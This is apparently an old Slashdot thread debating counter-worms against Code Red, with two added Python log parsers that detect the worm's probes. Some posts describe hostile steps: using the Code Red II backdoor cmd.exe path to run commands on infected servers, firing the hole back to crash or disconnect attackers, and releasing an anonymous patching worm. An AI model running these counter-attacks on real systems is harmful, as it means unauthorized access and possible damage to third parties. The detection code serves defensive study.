    Personally, I would be opposed to anything past 6, as they all involve unlimited expansion, and thus are potentially more harmful than the worm they are stopping. Below 5, I think is ok, although 4 does have some potential for harm. As long as the bot is properly limited to, say, one email per infected system per week, then I think the response is justified.

    5 is curious - it does involve cracking the infected system, but theoretically only at the behest of those who are infected. There is, however, a potential for abuse - you could spoof a request, and trick it into patching a different server. However, someone would have to actively choose to spoof it, so it effectively is no different than the spoofers running the exploit themselves. I.e. you've made it a tiny bit easier for them to do it, but didn't actually initiate the action.

    6 is onerous. It does involve cracking a system - but it's a system that is "attacking" you, and potentially others as well. I would rate it about the same as cold cocking someone who's been drugged, and is now running around swinging at everyone they see. I'm nervous about the idea of vigilante cracking, though - too much potential for abuse. Perhaps a compromise between this and 4 above - have someone "trusted" set up a cracker/patcher that only patches servers that are reported to it, and which it also agrees are infected and dangerous. Sort of like calling the net-cops on the server.
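
As an added example (not code from this thread or any poster), options 2 and 4 above can be driven from the web server's own access log: detect the default.ida probes, count them per source, and emit at most one notice per source per week, the limit suggested above. The log lines and addresses are constructed; the notice text and the one-week window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache Common Log Format; the sample further down is constructed, not real traffic.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# A Code Red probe is a GET for /default.ida whose query string starts with a
# long run of padding characters ('N' for Code Red, 'X' for Code Red II).
PROBE_RE = re.compile(r"^/default\.ida\?[NX]{50,}")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    return rec


def is_code_red_probe(path):
    """True if the request path carries the Code Red default.ida signature."""
    return PROBE_RE.match(path) is not None


def find_probes(lines):
    """Yield (source_ip, timestamp) for every Code Red probe in the log."""
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and is_code_red_probe(rec["path"]):
            yield rec["ip"], rec["ts"]


def probe_counts(lines):
    """Number of probes seen per source address."""
    counts = defaultdict(int)
    for ip, _ in find_probes(lines):
        counts[ip] += 1
    return dict(counts)


def plan_notifications(probes, last_notified=None, window=timedelta(days=7)):
    """Pick the probes that earn a notice: at most one per source per window.

    last_notified maps ip -> time of the last notice and is updated in place,
    so it can be persisted between runs of the bot. Returns [(ip, ts), ...].
    """
    if last_notified is None:
        last_notified = {}
    to_notify = []
    for ip, ts in sorted(probes, key=lambda p: p[1]):
        last = last_notified.get(ip)
        if last is None or ts - last >= window:
            last_notified[ip] = ts
            to_notify.append((ip, ts))
    return to_notify


def notice_text(ip, ts):
    """The message body the bot would mail to the contact for ip (assumed wording)."""
    return (
        f"Host {ip} sent a Code Red probe to this server at {ts:%Y-%m-%d %H:%M:%S %z}. "
        "It is probably running an unpatched IIS; please apply the vendor patch."
    )


# Constructed sample log: RFC 5737 documentation addresses, made-up times.
CR2 = "X" * 224   # Code Red II style padding
CR1 = "N" * 224   # first-generation Code Red padding
SAMPLE_LOG = [
    f'192.0.2.10 - - [05/Aug/2001:13:22:01 +0000] "GET /default.ida?{CR2}%u9090 HTTP/1.0" 404 285',
    f'192.0.2.10 - - [05/Aug/2001:13:23:40 +0000] "GET /default.ida?{CR2}%u9090 HTTP/1.0" 404 285',
    '203.0.113.5 - - [05/Aug/2001:13:30:12 +0000] "GET /index.html HTTP/1.1" 200 1043',
    f'198.51.100.7 - - [05/Aug/2001:14:00:00 +0000] "GET /default.ida?{CR1}%u9090 HTTP/1.0" 404 285',
    "this line is not a log record",
    f'192.0.2.10 - - [13/Aug/2001:13:22:01 +0000] "GET /default.ida?{CR2}%u9090 HTTP/1.0" 404 285',
]

if __name__ == "__main__":
    print(probe_counts(SAMPLE_LOG))
    for ip, ts in plan_notifications(find_probes(SAMPLE_LOG)):
        print(notice_text(ip, ts))
```

The second probe from 192.0.2.10 is suppressed by the one-week limit; the one eight days later earns a fresh notice.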

  419. Discussion rerun? by abischof · · Score: 2

    Haven't we already discussed this?

    --

    Alex Bischoff
    HTML/CSS coder for hire

  420. apache+mod_iis by scotsmancsua · · Score: 1

    A friend of mine, Dan Holliman, suggested that we write an apache module that performs exactly this. When the module receives a request to the default.ida path, it sends an HTTP query back to the requestor's IP using the hole to cause a system reboot or freeze, or to remove the default route or interface on that box.

  421. Fight Virus with Virus by OpCode42 · · Score: 1

    Reminds me of what my dad used to say... "Fight Fire with Fire".... He didn't last long in the fire brigade...

  422. The Ultimate Hack by brm · · Score: 1

    How about a worm which breaks into Windows/IIS, and replaces it with a Linux Apache system without upsetting the served site. Now that would be cool.

  423. Straight Outta Stephenson's "Diamond Age" by Papatoast · · Score: 1

    So this is how it all starts...Worms and AntiWorms..next thing you know..the air is thick with NanoStats running amok, choking air conditioners, clogging intake valves, and fouling tablecloths.

    --
    We were somewhere around Barstow on the edge of the desert when the drugs began to take hold. - HST
  424. I can see it now... by pukeAndCry · · Score: 2, Funny

    VbScript that uninstalls MS Outlook?

    JiM
    ---

    Better Living Through Reckless Experimentation

  425. Re:Its entirely possible by Anonymous Coward · · Score: 0

    Vacate my ass! If anybody ever walks into my house, let alone threatens me, I have every right to shoot his ass. Period.

  426. Write one that ... by Anonymous Coward · · Score: 0

    ...installs Apache instead of IIS :)

  427. Because of this the internet is dying.. by cybrthng · · Score: 2
    Really..

    I can no longer run services on port 80. As of tomorrow port 25 is filtered.

    Verizon is my DSL provider, Telocity is the only other choice and they use Verizon's network so the filters will remain even if I switch.

    I pay for Pro service and now some Virii/Worm has expired my abilities to run a hobby server at home

    Cable modems (@Home) aren't available in my area yet and they have a terms of service prohibiting running servers.

    Is the internet dying now that monopolies have 100% control? I mean Verizon is blocking services, other ISPs control the content and now even if I switch providers I'm still paying for a monopoly after all?

  428. Re:I Hope You Keep Bail Money Near Your Gun OT by Ed_Moyse · · Score: 2, Insightful
    Maybe in places like the UK they don't mind that robberies while the owner is home have gone up since the draconian gun laws. I do.
    Interesting. I read this over and over again on the internet, and it is complete and utter bollocks. If you were a burglar in the UK you were (and are) very, very unlikely to get shot even before the "draconian" gun laws came in. There simply weren't enough guns around to make it a worry. So even if burglaries HAVE gone up since then, it's completely and totally unrelated.
  429. Not a good idea by rangek · · Score: 2

    Just look at how many of these worms have had little bugs in them, like not attacking when they were supposed to, or emailing the wrong drop and stuff. All we need is some cowboy thinking he is going to clean up the internet and messing up even more stuff.

    Ever see that movie Office Space? One wrong decimal point could mean big trouble. It is bad enough these people have to run Microsoft's buggy code. But at least they chose to do that. They shouldn't be forced to run your buggy code too, even if you are trying to help.

  430. is that legal? by Anonymous Coward · · Score: 0

    why not just create a list, where admins can subscribe and their computers get automatically fixed using the counter-virus? The scanning algorithm sends a request to a central server that responds with an IP address that has been added to the list and the client checks that server.

  431. WWWWI - World Wide Web War one by Fortuno · · Score: 1

    Will the evolution of the WWW go in the direction of the humans? Will there be wars in which groups of pro-hackers, led by Bill Gates, join together to create a Nuke-Virus to get rid of the minority groups (e.g., VMS users)? While the Linux groups have a treaty to protect the small island of VMS, they must retaliate, in full force! Then the Mac users will join in on the side of MS. But the Windows users will be too snobby to associate with "people who don't have a character terminal". Thus a civil war between Windows and Mac.
    This sounds like a twisted war-in-the-making, resulting in the death of many computers!

    Note: I don't want to offend anyone

    --


    -- geekcode: GU d-- s+: a---- C++ UL++ P-- L++ E--- W++ N++ o K- w-- O M- V- PS PE- Y PGP- t 5 X R tv+ b
  432. Ain't this an old one? by dirtydog · · Score: 1

    Wasn't this same idea brought up a month or two ago and sufficiently trashed at that time???? Is /. the department of redundancy department?

  433. old news, surely? This has been done before: by ferret4 · · Score: 1

    Not only has this been done before, but it's been reported on slashdot. Next! http://slashdot.org/article.pl?sid=01/05/17/0038205&mode=thread http://news.bbc.co.uk/hi/english/sci/tech/newsid_1344000/1344344.stm

  434. Heh by ioexcptn · · Score: 1

    I thought of that myself...seems very possible...might be an invasion of privacy though.

    --

    Intelligence is like four wheel drive, having it just means you'll get stuck in more remote places.
  435. Its entirely possible by baptiste · · Score: 5, Interesting
    CodeRed II leaves a huge hole - the virtual C and D drives so even if they remove the root.exe file, as long as the explorer.exe is infected, you can access any file via /c or /d in your GET request (ie /c/winnt/system32/cmd.exe?any cmd you want)

    I'm sure folks will scream it's illegal and it probably is - but can't a case be made for 'self defense'? I mean, if someone brandishes a gun at me am I not within my rights to shoot them or at least take their gun away?

    Why not apply the same logic to this, they are probing me to infect my server so why can't I probe back and disarm them?

    1. Re:Its entirely possible by Anonymous Coward · · Score: 0

      [quote]
      So if entering http://www.slashdot.org is authorised, why not http://www.infectedbox.com/cmd.exe?somefunnystring thatdoessomethingonthewebserver ? Since in both cases they are HTTP requests, one could be a static page, but the other is a call to a server-side script.
      [/quote]

      This is a form of 'creative surfing' and as far as I know, legal in some countries.
      But for this example it is possible to create a DOS (like shutting down the server/nic with the request).

    2. Re:Its entirely possible by Tassach · · Score: 2
      If you wrote a program that counter-attacked any codered infected server that attacked you, the proper analogy would be returning fire whenever someone shot at you.

      However, if your countermeasure does anything BESIDES stopping the attack, you are going too far. IMHO, it would be ok to write a countermeasure that shut down the attacking system, or even one that patched the hole IN THE SERVER THAT ATTACKED YOU; but it would be wrong to develop a countermeasure that then tried to run itself on the "disinfected" machine and spread itself to other infected machines that never attacked you directly. The first scenario is (at least potentially) defensible under accepted doctrine (self-defense, good samaritan); the second is not.

      --
      Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
    3. Re:Its entirely possible by Anonymous Coward · · Score: 1, Interesting

      They would need about 50 lawyers to cover every area of law that is discussed on these boards.

    4. Re:Its entirely possible by Anonymous Coward · · Score: 0
      Mod this guy up to fucking +50^5000.

      That's about the most darn sane thing I've ever heard on slashdot...

    5. Re:Its entirely possible by Anonymous Coward · · Score: 0

      Alright then, now insult me. Soon you'll be +5 Insightful!

  436. Take it one step further... by Overt+Coward · · Score: 2, Flamebait

    And after closing the hole, the counter-virus should stay resident and launch a counter-attack against anyone who tries to exploit the hole with anything other than the counter-virus.

    1. Re:Take it one step further... by Overt+Coward · · Score: 2
      You know, I keep forgetting that I have to mark sarcasm as such when I post on the Internet -- inflection is lost entirely. Apologies to anyone who thought I was being serious.

      The original post, above, should have been flagged "(-1, Smartass)".

  437. not a good idea by Anonymous Coward · · Score: 0

    Max Vision from whitehats.com did something similar and is serving time for it...

  438. Use of Anti-Code Red Script Considered Harmful by Xeger · · Score: 2

    After hearing what everybody has to say, I've decided that this sort of script is probably not a good idea. To those of you who replied to me via email, I'll send you a link to a webpage where I'll be putting up the script, once I get hold of it. You'll be able to reach it after clicking through a disclaimer.

    I would still advise against anyone using this in "production" (i.e. to combat live code red attacks on the open Internet.) Think about it:

    If, for some reason, your copy of the script mis-performs and corrupts IIS DLLs or executables on the attacking host, you will be liable.

    If the federales are monitoring traffic and see your box actively exploiting the Code Red hole, you're in trouble.

    If your ISP notices your box "propagating" Code Red, then you are likely to be denied service (in the most literal manner) and your account might be terminated.

    So, in the final analysis, it's probably better just to put up a default.ida that does a "net stop w3svc" (as someone else here recommended) or does a reboot.

  439. It was proposed before with MS Outlook viruses by the_olo · · Score: 1

    Read that post from bugtraq archives: The proposal of creating such an automatic healer worm started a fierce discussion.

  440. This ORIGINAL post is from the newsgroups!!!!!!!!! by iwf · · Score: 1
    Hello,

    I sent in this article way before this other guy did. His comments sound awfully like my web site.

    See the newsgroups for a timestamp.
    microsoft.public.inetserver.iis.security,
    microsoft.public.scripting.virus.discussion
    AND
    alt.comp.virus

    Search on the terms, that I used first.
    Fight Virus With Virus?

    But then again, I didn't first come up with this idea any. Many other people did. I just used a little down-to-earth communication to drive home the point.

    See my newest argument at

    Bait-and-Injured-Virus OR Wounded Virus

    This may or may not get you around the trespassing legal problem

    This is the original page below
    http://www.internetwebfactory.com/antibodies-00-index.htm


    Philip Chin

  441. Then you get lawyers talking about computers... by iconnor · · Score: 1

    The lesser of the two evils. Geeks talking about law or Liability Lawyers talking about computers.
    If you want a good laugh, read a judgement about something computer related - always very funny.
    They need a Lawyer that is also a geek.

  442. where's by Anonymous Coward · · Score: 0

    "Radek" when we need him....:)

  443. Re:Why do favors? by Anonymous Coward · · Score: 0

    Just because they run IIS doesn't mean they should suffer more. For the good of the internet, ALL web servers need to be secure regardless of the vendor.

  444. Or not by Anonymous Coward · · Score: 0

    This would be a BAD idea. It's still a virus, and regardless of intent, you'd be open to litigation / incarceration because of it.

  445. This is definately not a good idea by Foxman98 · · Score: 2

    While the Code Red virus has been spreading rapidly, in part due to all those Windows 2000 users on cable modems, I think this idea of "fixing" everyone's computer is a really really bad one.

    By connecting to someone else's computer, and running code on it without their permission you are in fact committing an illegal activity. I think a much better idea would be to politely inform the machines' owners that their server is infected. Also providing a link to the patch.

    Any unauthorized access is scary. Remember that worm a while back that went around and "fixed" unix systems by patching holes? Remember the outcry about how no one would want that because it was "Their" server and whatnot. Same thing applies here.

    --
    S.t.e.v.e.
  446. first of all... by spam368 · · Score: 0

    first of all, I know I wouldn't want a virus continuously polling to see if someone is trying to use a backdoor, hell I don't need the slowdown after the virii is history... second, is it ethical to "fix" someone else's machine?

  447. Code Red II is an anti-virus, partially by Thagg · · Score: 2
    Code Red II has a fighting chance of killing off Code Red I, as it reboots machines that it finds. So, it is partially a good thing; beyond the fact that it will probably convince a percentage of people to abandon Microsoft servers.

    thad

    --
    I love Mondays. On a Monday, anything is possible.
  448. This is a Bad Idea by Satai · · Score: 4, Insightful

    This is a very Bad Idea. First of all, unauthorized access to a computer is, by definition unauthorized. Any worm which spreads changes is illegal and as such a Bad Idea.

    No matter how good your intentions are (RTM just wanted to play around, right?) you cannot take the "law" into your own hands.

    Ethical issues aside, it would be very dangerous to begin publicizing that there was a beneficial worm available; immediately, we would get copycat worms everywhere, appearing the same (yes, this could probably be circumvented by MD5 checksums or something, but jeez, if the webmaster was going to go through THAT much trouble, they'd install the damn patch themselves!) but doing far worse things.

    I'm not usually one to spout Libertarian philosophy - but in this case, if somebody wants to leave their box open - through ignorance, laziness, or some other ineffable reason - that is their choice and not the choice of some 15-year old hacker who thinks he'll redeem his l33t friends' images in the media's eyes.

    The defenses always have to be kept up - or else you have to start making judgment calls about which outside sources to give access to, which is a path no one wants to go down.

  449. Anti-codered Virus by triple_c · · Score: 1

    I contacted the local FBI office here in Tampa and they said that according to the current computer crimes law it would be alright to alter the source code of the Code Red virus and make it able to fix servers that are still open. The agent I spoke with also said I should consult a CyberLaw Attorney for more information but to her knowledge it would be legal and probably smiled upon.

    --
    //----(triple c)-------//
  450. Anti-Sub7 worm? by jonnydigital · · Score: 1

    A trojan is safe in the hands of someone who's not going to do any damage, but I've heard of people who go around handing out a Sub7 trojan in chatrooms... sorry, IRC channels ^_^, but disguised as a different kind of file. As soon as the 'victim' runs the file, the 'hacker' goes into their computer and totally wrecks their machine. Newbies don't know any better because it's not obviously a trojan. There ought to be a program that goes around automatically closing open sub7 trojans, or perhaps giving the infected user notification and asking them if they want it removed. How about it?

    --

    jd

  451. AntiVirus-Virus NOT a good idea by coniote · · Score: 1

    I don't think this would be a very good idea since we will be having a new problem (assuming that the antivirus-virus worked fine). If, and only IF, every user accepts that a virus like program fixes his machine, this program will spread through the internet like hell ( since no real antivirus will stop it), then, what stops a virus maker from modifying the code so it "looks" like the original, but actually does virus like activities? This will bring a nice problem to the antivirus companies, having to "filter" the bad virus and letting in the good virus. Now, let's talk about the users, generally stupid enough to double click on any attachment they get on their email. Knowing that a good virus is around will make them EVEN more uninformed about what they are running/opening, so if the antivirus software they are using tells them, "Hey this could be a virus, BUT could also be the good guy", asking them if they want to let it in, I have no doubt they would respond with a big YES and merry christmas!!!

  452. Well I'm working on my solution by Anonymous Coward · · Score: 0

    I've already finished writing a test utility to exploit the backdoor on my infected test server. Now I'm working on a PHP script that, on an attempted infection, will automatically send an HTTP request back to the attacker's backdoor telling it to use ipconfig to turn off the network adapter. If a virus attempts to DOS my line with an ARP storm such as this, I have a moral duty to help protect my neighbors and lock the door, no? You can't say there's no damage from the worm... reports are out today that entire ISPs are shutting down ADSL service for "possibly a couple of days"

  453. East is West and West is East? by fnj · · Score: 1

    ... the owner of the house is the one responsible for making sure the door is locked.

    Well, I can't accept the kind of topsy-turvy view this implies (or maybe I'm just inferring it).

    It is not unlawful and immoral to fail to lock your door. It is unlawful and immoral to enter the private property behind that door and trash it or steal things. Let's not lose sight of who is doing the wrongdoing.

    Is blatantly lax security unwise? Hell, yes! Do we want to settle for a society where every single thing has to be locked down tight, or vultures will vandalize and steal everything? Hell, no! Lock up to a reasonable extent, but at the same time, track down and prosecute the bejesus out of the real wrongdoers.

  454. who is next ... by Anonymous Coward · · Score: 0

    After sitting at the datacenter where I work
    and analyzing IDS logs and
    where code red packets are coming from...

    Man, a lot of "BigBoys" domains.

    I finally decided to close all my credit cards,
    which I used to buy stuff over the NET.

    Did You ?

  455. Already done, many times by SnapperHead · · Score: 1

    There are plenty of virus / worms that do this. For example, the Ramen bug. It didn't cause any damage, it patched up a few security holes, replaced the main web page so admins know what happened.

    It's funny when you look at the number of worms / viruses that affect Windows and how much damage they cause. It's also funny to look at how many worms are for Linux that don't do any real damage and simply secure a site for you. Now, it's not the answer.

    I was watching TechTV this morning, and they estimated that the code red worm costs over $2 Billion USD to fix. They also mentioned that companies aren't getting any smarter. They left with a question of why more companies don't wake up and move on. It's only going to get worse for MS products. The truth is, that *nix is generally much more secure. I personally think it's pretty damn impressive how secure OpenBSD, FreeBSD, Linux, etc are compared to Windows, and how many stupid companies there are still using Windows ...

    --
    until (succeed) try { again(); }
    1. Re:Already done, many times by Anonymous Coward · · Score: 0

      http://www.dynwebdev.com/codered/ These guys came up with a Java program that somehow reverses a codered attack and notifies the offending server. Mr. Gibson pointed this out in his NG.

  456. Why not get providers to get heavy? by Goonie · · Score: 2

    In this case, why don't the cable/xDSL providers start suspending the accounts of people with infected computers? That tends to get people's notice a lot more effectively than vigilante counter-viruses . . .

    --

    Any sufficiently advanced technology is indistinguishable from a rigged demo
    --Andy Finkel (J. Klass?)
    1. Re:Why not get providers to get heavy? by J'raxis · · Score: 2

      MediaOne.net prefers an approach à la machine-gunning a mosquito: completely block port 80 on their entire customer network.

  457. Re:Darwinian Predator - Prey relationship on the n by Dwonis · · Score: 3, Funny
    This is exactly the situation we want! It will force all our bosses to see that security is of utmost importance, and it will force Microsoft to either shape up or ship out.

    If only this sort of thing weren't illegal where I live...

  458. thinking of the way of fighting the virus ... by porky_pig_jr · · Score: 1

    how 'bout virgin sacrifices?

  459. This can get you busted. Seriously. by Tloluvin · · Score: 1
    Really baaaaaaad idea!

    First off, you can go to jail. This is very much like the stunt that got Max Butler, a.k.a. Max Vision, 18 months in Federal stir. Too bad, because he is an IDS wizard, as well as a pretty decent guy, from all reports. But if I were a DOD investigator working on this case, I'd probably want to see him in the slam myself.

    Secondly, you cannot audit the actions of a worm. And when you close a hole like the one Code Red exploits, you want the actions to leave an audit trail.

    Thirdly, an anti-worm-worm is not certain to infect, and thus patch, the systems that you want patched.

    Better in all ways to just suck it in and patch the systems you own, yourself. And email the poor schmucks who just don't know their W2K boxes have IIS servers running, unpatched, and which have thus been hit, that their systems are infected and infectious. I fired off an email to uunet two days ago about an infected box scanning the networks I monitor. The worm's scans shut down just three hours later. Coincidence?

  460. just watch out for fake fixes now... by Anonymous Coward · · Score: 0

    Just judging by the number of responses this topic has generated, I wouldn't be surprised if the code red III virus wasn't sent as an email that claimed to be a virus fix patch to computers uninfected to begin with. I'm still waiting to get infected with something that gets on irc and gets new released movies for me and throws it up on my desktop. Maybe the new wave of white hat hackers will be more grey hat and write exploits that are fun or helpful, but hardly damaging.

  461. Need a real virus to protect yourself by RGRistroph · · Score: 1
    A targeted script from a single machine is great if you are working on your own machines, say you want to clean the virus out of all machines behind the firewall at your place of employment, something like that.

    But if you are going to release this into the wild, people on various ISPs are going to see packets coming from your machine and accuse you of trying to hack them. If it infects a "sick" host, makes it well, then infects a few more "sick" hosts, and then deletes itself and all tracks it can from the first one, it's harder for them to find you to use as a scapegoat.

    Read up about Randall Schwartz and David McOwen before you jump in and run something like that, even if it is on your employer's computers and for good purpose. The fact is, sometimes you have to do your job anonymously.

  462. Re:I Hope You Keep Bail Money Near Your Gun OT by urtica · · Score: 2, Informative
    For more stats and analysis on guns than you could possibly want, see Tim Lambert's archive of his postings to talk.politics.guns
    Country       % at-home     % gun        homicide
                  burglaries    ownership    rate
    Netherlands   48            2            0.9
    England       26-59         5            0.7
    Australia     10            20           2.0
    Canada        10            31           2.1
    USA           14            49           8.8

    The Australian "at-home" burglary rate is actually for Victoria. The range given for England is because the rate is 59% for attempted burglaries and 26% for completed burglaries, so the overall rate must be somewhere in between.

    When one looks at the Australian and Canadian figures, the relationship between gun ownership and "at-home" burglaries isn't so clear as some like to make it out. The correlation between gun ownership and homicide rate is much clearer.
  463. I agree and disagree. by dosun88888 · · Score: 1

    Of course there are many ignorant posts. I've learned to respect people on a post-by-post basis. One day I read an informed opinion, and the next I see the same person talking out of their ass.

    The same would go for a post by a *real* lawyer. I wouldn't accept it until I researched it myself anyhow.

    Just don't do ANYTHING at all, and then you reduce your chances of being arrested for anything. Whether your action is illegal or not, your guilt will be decided by 12 ignorant buffoons anyhow.

    Basically, ignorant postings are a great way to figure out if you'll end up in jail for something or not.

    I'd like to request that people stop making ignorant technical postings, instead.

    ~D

  464. This is a bad idea because... by Christian · · Score: 1

    When someone writes a virus, they very often get it wrong. (Of course, this is just an extension of programmers making their usual mistakes.) As most people know, the Internet Worm had a bug which caused it to bring down machines but this wasn't actually what the author intended. Similarly many of the contemporary worms contain bugs which alter their impact from what their authors actually intended. Nonetheless, they are still very damaging -- sometimes more so due to these mistakes!

    If people start writing "benevolent" worms to fix these problems, they very likely aren't going to get it right the first time. Or even the second. It's hard to debug this sort of code because it's hard to actually predict how it will perform out there on the great sprawling mass of today's heterogeneous Internet. They will most likely release buggy code that will cause more damage than it will solve. Naturally this is just one problem and there are undoubtedly others, but I hope people don't end up going down this path. At least until some official, well-thought-out plan is established.

  465. Web Servers running, but nobody is home! by Rick+Richardson · · Score: 1

    I collected a hundred different IP addresses that were attacking my machine. Then I went to each of those web servers and took a look. 90% of them were completely unpopulated.

    Based on this statistic, I come to the conclusion that most of the problem lies with people that don't even realize they are running a web server. Perhaps when they installed NT they thought you needed to enable the web server in order to access the Internet. I don't know -- it's hard to get into the minds of the clueless.

    I further conclude that unless these people are proactively notified that they are the root of the problem, these servers will never get turned off or updated.

    -Rick
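
    Pulling the attacking addresses out of a web server log, as Rick describes doing, is a small log-parsing job. The following is an added example, not code from the original post: it matches the Code Red probe request (a GET for /default.ida? followed by a long run of N for the first worm or X for Code Red II, then %u-encoded shellcode) against Apache-style common-log lines and tallies unique source addresses per variant. The log lines and IP addresses are constructed for the example; the request shape follows the widely published Code Red probe.

```python
import re
from collections import Counter

# Apache/IIS "common log format": client IP, identd, user, [timestamp],
# "METHOD PATH PROTO", status, size. Only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The Code Red probe: GET /default.ida?<run of N (Code Red I) or X (Code Red II)>%u9090...
# The real filler is roughly 224 bytes; requiring 20+ keeps ordinary .ida hits from matching.
PROBE_RE = re.compile(r'^/default\.ida\?(?P<fill>N{20,}|X{20,})%u')

# Constructed sample log (not from the original post). Filler shortened for readability;
# the %u-encoded tail is the published Code Red probe tail.
_FILL_N = "N" * 60
_FILL_X = "X" * 60
_TAIL = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
         "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")

SAMPLE_LOG = "\n".join([
    f'192.0.2.10 - - [04/Aug/2001:10:12:01 -0500] "GET /default.ida?{_FILL_N}{_TAIL} HTTP/1.0" 404 275',
    '198.51.100.7 - - [04/Aug/2001:10:13:44 -0500] "GET /index.html HTTP/1.1" 200 1043',
    f'203.0.113.5 - - [04/Aug/2001:10:15:09 -0500] "GET /default.ida?{_FILL_X}{_TAIL} HTTP/1.0" 404 275',
    f'192.0.2.10 - - [04/Aug/2001:10:20:31 -0500] "GET /default.ida?{_FILL_N}{_TAIL} HTTP/1.0" 404 275',
    # An unrelated .ida request: must not be counted as a worm probe.
    '198.51.100.7 - - [04/Aug/2001:10:21:00 -0500] "GET /default.ida?short HTTP/1.1" 404 275',
])


def parse_line(line):
    """Return the captured log fields as a dict, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_probe(path):
    """Return 'CodeRedI', 'CodeRedII', or None for a request path."""
    m = PROBE_RE.match(path)
    if not m:
        return None
    return "CodeRedI" if m.group("fill").startswith("N") else "CodeRedII"


def attackers(log_text):
    """Count probes per (source IP, worm variant) across a whole log."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        variant = classify_probe(rec["path"])
        if variant:
            counts[(rec["ip"], variant)] += 1
    return counts


def unique_attacker_ips(log_text):
    """Sorted list of distinct source addresses that sent a Code Red probe."""
    return sorted({ip for ip, _ in attackers(log_text)})


if __name__ == "__main__":
    for (ip, variant), n in attackers(SAMPLE_LOG).most_common():
        print(f"{ip:15} {variant:10} {n} probe(s)")
```

    The resulting address list is the input to the step Rick did by hand: visiting each host's web root, or looking up the netblock owner to notify. Note that a 404 from your own server does not mean the probe failed everywhere; it only means this box was not IIS or was already patched.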

  466. Battlefield: Internet by l33tsp34ker · · Score: 1

    The war on Worms will be like any war. We have a common ground, (The internet) being fought over by 2 sides, (hackers and normals). In every conflict up to this point in time, 2 sides have battled with equal technology, and the ultimate deciding factor has been sheer numbers and willpower. The Battleground has always ended up being desecrated and useless. However, over time, peace returns as the remainder of the enemy and all its traces are eradicated. This will be the case on the Internet. Our weapons will be counter-worms, and the battlefield will be the Internet. Sure, it may become despoiled and hard drives may be ruined, but that is a small price to pay seeing as every other war has left entire cities destroyed. As I said, the Internet may well be destroyed as we know it, but in its place a new Internet will form, with a better way of doing things, and peace will return as hackers are confined one by one. Let the battle begin.

    --
    "The difference between genius and stupidity is that genius has its limits." -- Albert Einstein